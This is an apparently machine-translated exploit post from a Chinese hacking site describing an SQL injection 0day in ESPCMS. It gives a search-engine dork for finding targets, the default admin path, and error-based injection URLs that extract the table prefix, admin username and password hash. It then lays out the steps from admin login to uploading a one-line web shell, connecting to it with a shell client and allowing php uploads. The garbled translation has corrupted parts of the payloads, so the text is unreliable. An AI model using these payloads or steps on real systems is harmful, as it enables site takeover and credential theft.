ESPCMS pass to kill 0day-vulnerability warning-the black bar safety net

2011-12-04T00:00:00
ID MYHACK58:62201132512
Type myhack58
Reporter 佚名
Modified 2011-12-04T00:00:00

Description

Baidu keywords:inurl:index. php? ac=article&at=read&did=

===========================================================================================================

默认 后台 :adminsoft/index.php OR admin

===========================================================================================================

Burst table prefix:index. php? ac=search&at=taglist&tagkey=%2 5 2 7,tags) or(select 1 from(select count(),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema. the tables where table_schema=database() limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a)%2 3

!

=========================================================================================================== Proof USER: index. php? ac=search&at=taglist&tagkey=%2 5 2 7,tags) or(select 1 from(select count(),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from the prefix _admin_member limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a)%2 3

===========================================================================================================

Explosion password: index. php? ac=search&at=taglist&tagkey=%2 5 2 7,tags) or(select 1 from(select count(),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from the prefix _admin_member limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a)%2 3

===========================================================================================================

Password and user one-time burst: index. php? ac=search&at=taglist&tagkey=%2 5 2 7,tags) or(select 1 from(select count(),concat((select (select concat(0x7e,0x27,username,0x27,password)) from the prefix _admin_member limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a)%2 3

! username: admin password: 64039aa42fa57087e880a77a10f10298 the end surface 1 A digital is not only off to the front of the 3 2-bit,hack have admin_tmtmw)

===========================================================================================================

Take the shell: Into the background, and directly click on the classified images===modified==selected file===upload directly word Trojan

Then with a kitchen knife connection....................................

PS: when uploading no php net horse, go to System Settings, About, add picture upload format |php. So that you can upload a picture file of the head mesh horse